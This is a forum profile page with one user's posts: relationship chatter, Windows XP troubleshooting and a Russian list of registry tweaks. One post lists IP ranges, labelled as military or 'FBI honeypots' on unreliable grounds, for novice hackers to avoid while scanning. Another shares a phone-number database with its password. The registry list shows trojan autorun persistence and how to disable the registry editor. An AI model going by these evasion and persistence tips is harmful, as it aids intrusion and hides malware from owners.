Jump to content

Zmei

Forumjan
  • Posts

    263
  • Joined

  • Last visited

Everything posted by Zmei

  1. ja lichno schitau chto net, bez flirta nepolychitsja, inogda etot flirt vilivaetsja v lubov, kotoraja i nevsegda daet schaste, no eto yje melochi Lubov ona i v Afrike Lubov, glavnoe nezaiti pooshibke v GEY club na chashky kofe looooooooooooooooooooooooooooooooooooooool
  2. jana nezabivai chto tochki zrenija myjikov i jenshin ochen raznie, i poroi jenskie objasnenija dlja myjika vigljadjat takim bredom, kak i nashi objasnenija vam :lol: mogy dat sovet, ego mojno nebrat na vooryjenie, no postarajasja nedavat emy povoda, raz on takoi, i ti ego lubish, to postoraisja bit takoi kakoi on xochet tebja videt, i neschitai skolko raz i kto kogo obidel iz vas, i nikogda nedyisja sheeet sam prochital to chto napisal, i chyt jazik v yzel nesvjazal looooooooooool
  3. chto ti imell v vidy? priiti s raboti domoi ystavshim, s poroga dat ei v glaz, poest i sest k TV?? looooooooooooooooooooooool ili bit samim soboi??? ili bit tem kem obna xochet chtob ti bil v etot moment? ili bit mojet ...........................
  4. vidishi, dve pozicii na odin i tot ge vopros, s odnoii storoni podlost, s drygoi dobro, interesno kto stavit granici dobra i zla, i kto rassydit ja lichno schitau chto esli lubish, to mojesh delat vse chtob chelovek bil tvoi lichno ja v jizni vsegda tak postypal, a te kotorie lubjat so storoni radyjas lubov²u drygix, ja schitau eto slabostu takoi vot ja kaka loooooooooool
  5. Zmei

    Опрос

    klasnno skazal tot chelovek kotorii tak virazilsja, no ja dymau inogda slovo lubimaja tak ytriryut, chto slishish ego postojanno i neponimaesh ili nevkladivaesh tot smisl kotorii tak trepetno volnyet ix serdca, inogda slovo lubovnik bit mojet virajaet te chystva gde mojno bit pilkim, strastnim, nejnim, mojet daje chyt poxotlivim..... neznau, naverno trydno tak sidet i rassyjdat ob etom, s chashkoi kapuchino v rykax, bit mojet nyjno sprosit y tex , kto jarosno vstrechautsja gybami skajem v lifte, ili na ylice, ..... romantika, xochetsja samomy sebe skazat, bratan ti chegooo, takoi bolshoi i verish v skazzki, no inogda xochetsja v nix verit, ved ja dymau bez etix skazok jizn bydet cherno belaja, esli chestno v slove lubovnik est i mnogo negotivnogo esli smotret s tochki zrenija semi.... ved mi vse taki s mentalitetom armjanskim, xotja bolshinstvo i nejivet na istoricheskoi rodine )
  6. kak schitaete v borbe za lubimogo cheloveka imeet mesto nechestnaja igra? mojno li v glazax lubimogo ochernit sopernika?sopernicy? rech idet ne o grjaznom kompromate, o tom kak snijat reiting sopernika v glazax lubimogo cheloveka vopros ochen skolzkii, no dymau interesnii
  7. interesno kakie emocii voznikaut y vas o slove LUBOVNIK ili LUBOVNICA dlja kogoto eto naricatelnie pozicii , kotorii govorjat o grjaznom razvrate, dlja kogoto eto polojitelnoe, govorjashee chto danii chelovek bolshe chem dryg i partner chelovek sklonen tolkovat vse tak, kak diktyet moment vremeni kogda vse proisxodit, neznau, mojet i tak, a mojet i net
  8. a vot naschet sobstvenogo IP ochen sovetyu proskanirovat, xot bydete znat chto y vas otkrito, i na chto nyjno zaplatki stavit chtob potom neydivljatsja kak eto vas vibili
  9. vot narod, on daje neznaet kak emy s virusami borotsja, a vi emy format sovetyete, i kto iz vas ymnikov emy potom po telefony comp instalirovat bydet ???? :lol: :lol: :lol:
  10. dlja tex kto lubit sovat svoi nos kyda nenado privojy spisok serverov i setok kotorie nestoit skanirovat na dirki, osobenno predyprejdau nachinaushix LaMeRoV i XaKeRoV, na ETI IP NESOVATSJA esli nexotite popast pod postojanoe nabludenie i scaning vashego trafika 6.*.*.* : Army Information Systems Center 21.*.*.* : US Defense Information Systems Agency 22.*.*.* : Defense Information Systems Agency 26.*.*.* : Defense Information Systems Agency 29.*.*.* : Defense Information Systems Agency 30.*.*.* : Defense Information Systems Agency 49.*.*.* : Joint Tactical Command 50.*.*.* : Joint Tactical Command 55.*.*.* : Army National Guard Bureau 62.0-30.*.* : 64.224.* : (FBI's honeypot) 64.225.* : (FBI's honeypot) 64.226.* : (FBI's honeypot) 128.47.*.* : Army Communications Electronics Command (NET-TACTNET) 128.50.*.* : Department of Defense (NET-COINS) 128.51.*.* : Department of Defense (NET-COINSTNET) 128.56.*.* : U.S. Naval Academy (NET-USNA-NET) 128.63.*.* : Army Ballistics Research Laboratory (NET-BRL-SUBNET) 128.80.*.* : Army Communications Electronics Command (CECOM) (NET-CECOMNET) 128.98.*.* : Defence Evaluation and Research Agency (NET-DERA-UK) 128.154.*.* : NASA Wallops Flight Facility (NET-WFF-NET) 128.155.*.* : NASA Langley Research Center (NET-LARC-NET) 128.156.*.* : NASA Lewis Network Control Center (NET- LERC) 128.157.*.* : NASA Johnson Space Center (NET-JSC-NET) 128.158.*.* : NASA Ames Research Center (NET-MSFC-NET) 128.159.*.* : NASA Ames Research Center (NET-KSC-NET) 128.160.*.* : Naval Research Laboratory (NET- SSCNET) 128.161.*.* : NASA Ames Research Center (NET-NSN-NET) 128.183.*.* : NASA Goddard Space Flight Center (NET-GSFC) 128.216.*.* : MacDill Air Force Base (NET-CC-PRNET) 128.217.*.* : NASA Kennedy Space Center (NET-NASA-KSC-OIS) 128.236.*.* : U.S. Air Force Academy (NET-USAFA-NET 139.142.*.* 155.7.*.* : American Forces Information (NET-AFISHQ-NET1) 155.8.*.* : U.S. ArmyFort Gordon (NET-GORDON-NET5) 155.9.*.* : United States Army Information Systems Command (NET-LWOOD-NET2) 155.74.*.* : PEO STAMIS (NET-CEAP2) 155.75.*.* : US Army Corps of Engineers (NET-CEAP3) 155.76.*.* : PEO STAMIS (NET-CEAP4) 155.77.*.* : PEO STAMIS (NET-CEAP5) 155.78.*.* : PEO STAMIS (NET-CEAP6) 155.79.*.* : US Army Corps of Engineers (NET-CEAP7) 155.80.*.* : PEO STAMIS (NET-CEAP 155.81.*.* : PEO STAMIS (NET-CEAP9) 155.82.*.* : PEO STAMIS (NET-CEAP10) 155.83.*.* : US Army Corps of Enginers (NET-CEAP11) 155.84.*.* : PEO STAMIS (NET-CEAP12) 155.85.*.* : PEO STAMIS (NET-CEAP13) 155.86.*.* : US Army Corps of Engineers (NET-CEAP14) 155.87.*.* : PEO STAMIS (NET-CEAP15) 155.88.*.* : PEO STAMIS (NET-CEAP16) 155.178.*.* : Federal Aviation Administration (NET-FAA) 155.213.*.* : USAISC Fort Benning (NET-FTBENNNET3 155.214.*.* : Director of Information Management (NET-CARSON-TCACC ) 155.215.*.* : USAISC-FT DRUM (NET-DRUM-TCACCIS) 155.216.*.* : TCACCIS Project Management Office (NET-FTDIX-TCACCI) 155.217.*.* : Directorate of Information Management (NET- EUSTIS-EMH1) 155.218.*.* : USAISC (NET-WVA-EMH2) 155.219.*.* : DOIM/USAISC Fort Sill (NET-SILL-TCACCIS) 155.220.*.* : USAISC-DOIM (NET-FTKNOX-NET4) 155.221.*.* : USAISC-Ft Ord (NET-FTORD-NET2) 195.10.* : (FBI's honeypot) 205.96-103.* : (FBI's honeypot) 207.30-120.* : (FBI's honeypot) 207.60.2.128-207.60.2.255 Abacus Technology (NETBLK-TIAC-ABACUSTC) 207.60-61.* : (FBI Linux servers used to trap scanners) 212.159.40.211 : (FBI's honeypot) 212.159.41.173 : (FBI's honeypot) 212.159.0.2 : (FBI's honeypot) 212.159.1.1 : (FBI's honeypot) 212.159.1.4 : (FBI's honeypot) 212.159.1.5 : (FBI's honeypot) 212.56.107.22 : (FBI's honeypot) 212.159.0.2 : (FBI's honeypot) 212.159.33.56 : (FBI's honeypot) 212.56.107.22 : (FBI's honeypot) 209.35.* : (FBI's honeypot) 216.25.* : (FBI's honeypot) 216.247.* : (FBI's honeypot) 216.25.* : (REAL DANGEROUS) 216.247.* : (REAL DANGEROUS) 217.6.*.* : jelau ydachi v Vashem nelegkom trude
  11. mojet komy i bydet interesno i polezno ), predyprejadau nomera tolko na 40 mobil-hpone database parol k fily ashot
  12. rebjata ja dokapalsja koroche, k inety nepodkluchal tolko stavil set, i ta je petryshka, service seti svorachivaet vse, snachala ja ego nastroil chtobi on nevirybal comp, a sam peregryjalsja tolko service, potom LABN analaizerom posmotrel protokol, chto k chemy i kyda idet, okazalos moi provaider sobaka postavil BUG na nelecinzeonie XP ) vot S......KI ) lekarstvo odno stavit firewall, i prerivat zaprosi na licenziu ) da vek jivi, vek ychis, vse ravno oni menja nepoborjat, eto naverno posle togo kak ja skorost svoego DSL opjat podnjal na 10MBit, a to provaider tolko na 3.3Mbit daet
  13. rebjat rech idet ne o viruse, virusi ja razlichau i tak, mojet delnoe chto skajete?? service LSA shell daet minyty na svertivanie filov, i delaet shut down mojet vstrechalsja kto s takim, i tolko takoe prosxodit kogda podkluchaeshsja k inety, v ostalnix ge sityacijax nichego
  14. vstretil problemy, reshil postavit zanovo XP, posle instalacii vse proshlo normalno, postavil DSl, kak tolko zakonektilsja, minyti cherez 3 wind rygnylsja, skazal chtob ja vse zakril, i chto cherez minyty vse virybitsja, i tak kajdii raz LSA shel report dymal chto virus kakoi, postavil radi interesa novii HD, taje petryshka, nepoimy v chem delo mojet kto vstrechalsja s etim??? blagodaren vsem za misli Zmei
  15. posilau pozdravlenija vsem ychastnikam kto bil na etix vstrechax, i sobaleznovanija tem kogo nebilo, molodci chto sobralis, administracija portala nadejatsja chto vstrechi bydyt chastimi i kolichestvo ychastnikov vstrech bydet RASTI, xoroshix ludei ostalos tak malo, i nas nyjno berech, :lol: ja vsegda radyus kogda virtyalnie otnoshenija v nashem portale perexodjat v realnie contakti, OSOBIE pozdravlenija zachinshikam etix vstrech i blagodarnost s zaneseniem v lichnoe delo :lol: :lol: Pachikner ym gidem, jerm jerm
  16. vot poetomy i vilojil etot material, chtobi kopalis znaja v chem a ytilit ranshe nebilo dorogoi dryg ) eto seichas vi vsekrytie ) s utilitami rabotaete )
  17. Сегодня я решился-таки опубликовать данные о реестре. Понимающий человек все-равно оценит данную статью. Так что желаю всем, кто умнее ламеров удачи в прочтении. ---------------- ЗАПИСИ: Автозапуск HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Параметр: любой. (Например: "мой троян") Тип значения: текстовое(REG_SZ). Значение: ссылка на автозапускаемый файл(Например: C:\windows\trojn.exe). ------------------------------------------------------------------------------- ОТКЛЮЧИТЬ РЕДАКТОР СИСТЕМНОГО РЕЕСТРА' HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System' iараметр: DisableRegistryTools' значение(REG_DWORD): (1-отключить, 0-включить).' Удаление группы из меню "Пуск"-"программы"-"Стандартные" (Windows 9x и NT) Отключает отображение группы "Стандартные", когда пользователь выбирает пункт "Программы" из меню "Пуск". Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] Параметр: NoCommonGroups Тип значения: числовой(REG_DWORD) Значение: (0 = отключено, 1 = включено) ---------------------------------------------------------------------------- Отключение команды "Выключить компьютер" (Windows 9x и NT) 'Этот параметр позволит Вам не дать пользователям выключать компь' + 'ютер с помощью команды "Выключить ' 'компьютер".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoClose' 'Тип: числовой(REG_DWORD)' 'Значение: (0 = допустить выключение, 1 = блокировать выключение)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление папки "Избранное" из меню "Пуск" (Windows 9x и NT)' 'Чтобы удалить папку "Избранное" из меню "Пуск", измените этот кл' + 'юч системного реестра.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoFavoritesMenu' 'Тип: REG_DWORD' 'Значение: (0=отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Скрытие всех элементов на Рабочем столе (Windows 9x и NT)' 'Установка этого параметра скрывает все элементы и программы на Р' + 'абочем столе Windows.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoDesktop' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение кэширования пароля домена' 'Включение этого параметра, отключает кэширование пароля NT домен' + 'а, и поэтому, чтобы обратиться к ' 'дополнительным ресурсам домена будет необходимо заново вводить п' + 'ароль.' 'Ключ: [HKEY_LOCAL_MACHINE\Network\Logon]' 'Параметр: NoDomainPwdCaching' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Диалоговое окно уведомления об ответственности перед входом в си' + 'стему (Windows 9x и NT)' 'Используйте этот ключ, чтобы создать диалоговое окно, которое бу' + 'дет отображено для любого пользователя ' 'перед входом в систему.' 'Это полезно тогда, когда требуется предупредить людей, делающих ' + 'попытку войти в систему, и не имеющих ' 'на то прав, об ответственности.' '1. Используя Regedit, найдите соответствующий ключ для вашей опе' + 'рационной системы.' 'Windows 9x:' 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Win' + 'logon' 'Windows NT:' 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\' + 'Winlogon' '2. Измените значение параметра '#39'LegalNoticeCaption'#39' так, чтобы о' + 'но соответствовало заголовку диалогового' 'окна (например '#39'Внимание!'#39'). Если этот параметр не существует, с' + 'оздайте его.' '3. Затем установите значение параметра '#39'LegalNoticeText'#39' так, чт' + 'обы он был равен содержанию диалогового ' 'окна (например '#39'Не входите в систему, если у Вас нет полномочий!' + ' '#39')' '4. Выйдите из Regedit, перезагрузитесь, и при следующей загрузка' + ', у Вас должно появится диалоговое окно ' 'с ' 'предупреждением.' 'Параметр: LegalNoticeCaption, LegalNoticeText' 'Тип: REG_SZ' 'Значение: любое.' '----------------------------------------------------------------' + '----------------' '' 'Удаление меню "Файл" из Проводника (Windows NT)' 'Удаляет меню "Файл" из инструментальной панели Проводника. (Этот' + ' параметр была добавлен в Сервисном ' 'Пакете 2.)' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoFileMenu' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление команды "Найти" из меню "Пуск" (Windows 9x и NT) ' 'Когда включен этот параметр команда '#39'Найти'#39' будет удалена из мен' + 'ю "Пуск".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoFind' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Скрытие значка "Сетевое окружение" (Windows 9x и NT)' 'Значок "Сетевое окружение" отображается на Рабочем столе Windows' + ', когда установлено соединение с ' 'сетью. При включении этого параметра, значок будет скрыт.' 'Кроме того, этот параметр отключает свойство UNC внутри интерфей' + 'са Проводника, включая команду ' '"Выполнить..." из меню "Пуск". Пути UNC конфигурируются' 'администратором в "Наборе правил" для общедоступных папок, насто' + 'льных значков, команды "Пуск", и т.д.' 'Это не влияет на функциональные возможности' 'командной строки, при выполнении команды "Net.exe".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoNetHood' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление папки "Документы" из меню "Пуск" (Windows 9x и NT)' 'Этот параметр удалит папку последних открытых документов из меню' + ' "Пуск".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoRecentDocsMenu' 'Тип: REG_DWORD' 'Значение: (0=отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление команды "Выполнить" из меню "Пуск" (Windows 9x и NT)' 'Этот параметр не дает пользователям запускать программы или проц' + 'ессы из меню "Пуск", удаляя этот ' 'пункт полностью.' 'Обратите внимание: Если пользователь имеет доступ к командной ст' + 'роке МС-ДОС, он все равно сможет ' 'запускать любые программы.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoRun' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Сохранение параметров окна Проводника (Windows 9x и NT)' 'С помощью этого параметра Вы можете определить, будут ли Ваши на' + 'стройки настольных параметров' 'сохранены при выходе из Windows.' 'Для установки этого параметра найдите ключ указанный ниже и изме' + 'ните его значение, как Вам ' 'необходимо.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoSaveSettings' 'Тип: REG_BINARY' 'Значение: (00 00 00 00=отключено, 01 00 00 00=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение сохранения параметров настройки при выходе (Windows 9' + 'x и NT) ' 'Обычно, при выходе Windows сохраняет настольную конфигурацию, вк' + 'лючая расположение значков, вид и ' 'т.д. ' 'Этот параметр отключает' 'сохранение изменений этих настроек. Такая функция может быть пол' + 'езна, как в безопасной среде, так и ' 'тогда, когда Вы не хотите, чтобы другие' 'люди изменили любимый вид Вашего Рабочего стола.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoSaveSettings' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление пункта "Настройка" из меню "Пуск" (Windows 9x и NT)' 'Удаляет папки "Панель управления" и "Принтеры" из меню "Настройк' + 'а". Обратите внимание: Удаление ' 'пунктов "Панель задач", "Панель управления"' 'и "Принтеры" удалит полностью и само меню "Настройка".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoSetFolders' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление пункта "Панель задач" в меню "Настройки" из меню "Пуск"' + ' (Windows 9x и NT)' 'Включение этого параметра, удаляет пункт "Панель задач" в меню "' + 'Настройка" из меню "Пуск", и не дает ' 'пользователям изменять свойства Панели задач.' 'Обратите внимание: Удаление пунктов "Панель задач", "Панель упра' + 'вления" и "Принтеры" удалит ' 'полностью' 'и само меню "Настройка".' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoSetTaskbar' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение контекстного меню для Панели задач (Windows NT)' 'Удаляет контекстные меню для Панели задач, используемые в кнопке' + ' "Пуск", Области управления и часах. ' '(Этот параметр была добавлен в Сервисном Пакете 2.)' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoTrayContextMenu' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение заданного по умолчанию контекстного меню Проводника (' + 'Windows NT) ' 'Удаляет контекстное меню, которое обычно появляется, когда Вы ще' + 'лкаете правой кнопкой мыши на ' 'Рабочем столе или в' 'правом окне Проводника. (Этот параметр была добавлен в Сервисном' + ' Пакете 2.)' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoViewContextMenu' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Ограничение списка программ, которые пользователи могут запускат' + 'ь (Windows 9x и NT)' 'Windows дает возможность ограничить список программ, которые мог' + 'ут быть запущены пользователями на ' 'рабочей станции.' '1. Используя Regedit, найдите ключ указанный ниже.' '2. Установите значение параметра '#39'RestrictRun'#39' равным '#39'1'#39' для ис' + 'пользования данной функции или равной '#39'0'#39' ' 'для ее блокировки. Создайте этот параметр, если его не существуе' + 'т.' '3. Определите программы, которые должны запускаться, в ключе: ' '[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Pol' + 'icies\Explorer\RestrictRun].' 'Создайте новый параметр для каждой программы, именуя их числами ' + 'по возрастанию. Например:' #39'1'#39'='#39'c:\windows\notepad.exe'#39 #39'2'#39'='#39'c:\program files\msoffice\winword.exe'#39 '...' '4. Выйдите из Regedit, и перезагрузитесь, что бы изменения вступ' + 'или в силу.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: RestrictRun' '' '----------------------------------------------------------------' + '----------------' '' 'Недоступный блок "Запомнить пароль" в Удаленном доступе к сети' 'Если у Вас проблемы с DUN при запоминании Вашего пароля, т.е. Вы' + ' видете, что опция "Запоминить ' 'пароль" ' 'отключена, то имеется несколько способов, которые можно использо' + 'вать для решения этой проблемы.' '1. Удостоверьтесь, что на вашей системе установлен "Клиент для с' + 'ети Microsoft". Панель управления / Сеть / ' 'Добавить... / Клиент / Добавить.../ Microsoft / Клиент для сети ' + 'Microsoft.' '2. Вспомните, происходил ли запуск Windows так, чтобы при отобра' + 'жении диалогового окна входа в систему ' 'и ' 'запросе пароля Вы нажимали клавишу "Esc".' '3. У Вас может быть поврежден файл пароля. Произведите поиск фай' + 'лов *.pwl в каталоге Windows, и ' 'переименуйте все найденные файлы. Примечание: это действие заста' + 'вит Вас создать файлы паролей ' 'заново.' '4. Проверьте системный реестр:' '· Запустите Редактор системного реестра (REGEDIT.EXE).' '· Найдите ключ [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu' + 'rrentVersion\Network\Real Mode ' 'Net].' '· если Вы увидите, что значение параметра "Autologon" равно "00 ' + '00 00 00" то, дважды щелкните на этом' 'параметре, и измените значение на "01 00 00 00 00".' '· Выйдете из RegEdit и перезагрузите PC.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVers' + 'ion\Network\Real Mode Net]' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление или добавление постоянно подключенных дисков к Вашему с' + 'писку' 'Windows сохраняет названия предварительно отображенных дисков, э' + 'то может создать угрозу защиты, ' 'если ' 'в списке будут перечислены скрытые диски. Суть состоит в том, чт' + 'о этот ключ может использоваться для ' 'установки заданных по умолчанию элементов такого списка. Наприме' + 'р, для неопытных пользователей, ' 'которым требуется, отобразить только общие диски.' '1. Откройте системный реестр, и найдите ключ указанный ниже.' '2. В этом ключе перечислены все совместные диски, которые Window' + 's сохранила для текущего ' 'пользователя, удалите элементы, которые Вы не хотите сохранять. ' + 'Или добавьте новые, создав новый' 'строковый параметр, и назвав его, буквой, увеличив алфавитное зн' + 'ачение уже имеющихся в списке дисков. ' 'Приравняйте значение к диску, который Вы желаете совместно испол' + 'ьзовать.' 'Обратите внимание: Это изменение воздействует только на текущего' + ' пользователя, для того, что бы ' 'изменить значение по умолчанию для всех пользователей, измените ' + 'таким же образом ключ ' '[KEY_USERS\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion' + '\Network\Persistent Connections].' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVe' + 'rsion\Network\Persistent Connections]' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение совместно используемых файлов и принтеров' 'Опция '#39'Файлы и принтеры это компьютера можно сделать общими'#39' поз' + 'воляет предоставлять услуги другим ' 'пользователям сети. Эти функциональные возможности могут быть за' + 'блокированы, изменением этого ' 'параметра.' '1. Используя Regedit, найдите ключ указанный ниже, если он не су' + 'ществует, создайте его.' '2. Создайте два новых параметра '#39'NoFileSharing'#39' и '#39'NoPrintSharin' + 'g'#39' типа DWORD.' '3. Установите значения '#39'NoFileSharing'#39' и '#39'NoPrintSharing'#39' равным' + 'и '#39'1'#39' для блокировки совместного' 'использования, или равными '#39'0'#39' для того, чтобы позволить совмест' + 'ное использование. Оба параметра ' 'должны быть вместе заблокированы или допустимы.' '4. Выйдите из Regedit и перезагрузитесь.' 'Ключ: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVers' + 'ion\Policies\Network]' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Определение привилегированного сервера сети обеспечения' 'Для определение заданного по умолчанию сервера сетевого обеспече' + 'ния, используйте этот параметр.' '1. Используя Regedit, найдите ключ указанный ниже, если его не с' + 'уществует, создайте его.' '2. Создайте новый строковый параметр, и назовите его '#39'Authentica' + 'tingAgent'#39', установите значение ' 'параметра ' 'равным имени Вашего привилегированного сетевого сервера.' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP' + '32\NetworkProvider]' 'Параметр: AuthenticatingAgent' 'Тип: REG_SZ' '' '----------------------------------------------------------------' + '----------------' '' 'Изменение времени отключения автоматической блокировки LAN' 'Windows NT может быть сконфигурирован так, чтобы автоматически р' + 'азъединять сеансы LAN при простое, ' 'за определенное количество минут.' '1. Откройте Ваш системный реестр, и найдите ключ указанный ниже.' '2. Установите значение параметра '#39'Autodisconnect'#39' равным задержк' + 'е в минутах перед разъединением сеанса.' 'Если этот параметр не существуют, создайте новый строковый парам' + 'етр под этим именем.' '3. Перезагрузите Windows NT.' 'Обратите внимание: Для отключения функции Автоматического разъед' + 'инения, установите значение равным ' #39'Oxffffffff'#39'.' 'Ключ: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Lanm' + 'anServer\Parameters]' 'Параметр: Autodisconnect' 'Тип: REG_DWORD' 'Значение: от 0 до 4,294,967,295 (Oxffffffff) в минутах' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение функции автоматического входа в систему сетевого обес' + 'печения' 'Этот параметр блокирует автоматический вход в систему на сервер ' + 'сетевого обеспечения.' '1. Используя Regedit, откройте ключ указанный ниже, если его не ' + 'существует, создайте его.' '2. Создайте новый параметр '#39'DisableDefaultPasswords'#39' типа DWORD,' + ' и установите его значение равным '#39'1'#39' для ' 'блокировки автоматического входа в систему, или равным '#39'0'#39' для и' + 'спользования автоматического входа в ' 'систему.' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NWNP' + '32\NetworkProvider]' 'Параметр: DisableDefaultPasswords' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Отображение подтверждения при входе в систему домена' 'Когда этот параметр включен, будет отображаться диалоговое окно ' + 'об успешной проверке, при входе на ' 'домен Windows NT.' 'Ключ: [HKEY_LOCAL_MACHINE\Network\Logon]' 'Параметр: DomainLogonMessage' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Требование проверки для доступа в сеть Windows' 'По умолчанию Windows не требует проверки сетевого имени пользова' + 'теля и его пароля, для использования ' 'локальной машины Windows. Эти функциональные возможности могут б' + 'ыть изменены.' 'Ключ: [HKEY_LOCAL_MACHINE\Network\Logon]' 'Параметр: MustBeValidated' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение доступа к вызову по телефону' 'Такая возможность существует у пользователей с установленным мод' + 'емом на Windows машине, и ' 'использующими Удаленный доступ к сети, позволяющий вызывающим со' + 'единяться с внутренней сетью. В ' 'групповой среде это может причинять ущерб защите.' 'Ключ: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVers' + 'ion\Policies\Network]' 'Параметр: NoDialIn' 'Тип: REG_DWORD' 'Значение: (0 = допустить удаленный доступ, 1 = заблокировать уда' + 'ленный доступ)' '' '----------------------------------------------------------------' + '----------------' '' 'Автоматический поиск медленных сетевых подключений' 'По умолчанию, Windows NT будет пытаться обнаружить задержку врем' + 'ени на сетевых связях, чтобы ' 'определить их быстродействие. Эти функциональные возможности мог' + 'ут быть заблокированы, если ' 'Windows ' 'NT имеет проблемы, при определении быстродействия вашего подключ' + 'ения.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: SlowLinkDetectEnabled' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Определение скорости подключения ' 'Windows NT использует этот параметр, чтобы определить, что являе' + 'тся низкоскоростным подключением, а ' 'что является высокоскоростным подключением. Заданная по умолчани' + 'ю задержка времени - 2000 ' 'миллисекунд , любое подключение, которое будет медленнее этой ус' + 'тановки, рассматривается как' 'низкоскоростное подключение.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: SlowLinkTimeOut' 'Тип: REG_DWORD' 'Значение: Время (миллисекунды)' '' '----------------------------------------------------------------' + '----------------' '' 'Поддержка длинных имен файлов на серверах сетевого обеспечения ' 'Этот параметр управляет поддержкой длинных имен файлов (LFN) на ' + 'серверах сетевого обеспечения, и если' 'поддержка существует, то он так же определяет версию сервера.' '1. Используя Regedit, откройте ключ указанный ниже, если его не ' + 'существует, создайте его.' '2. Создайте новый параметр типа DWORD, и назовите его '#39'SupportLF' + 'N'#39'.' '3. Установите значение параметра '#39'SupportLFN'#39' равным '#39'0'#39', '#39'1'#39' ил' + 'и '#39'2'#39' в зависимости от таблицы указанной ' 'ниже:' 'Описание Значения' '----- -----------' '0 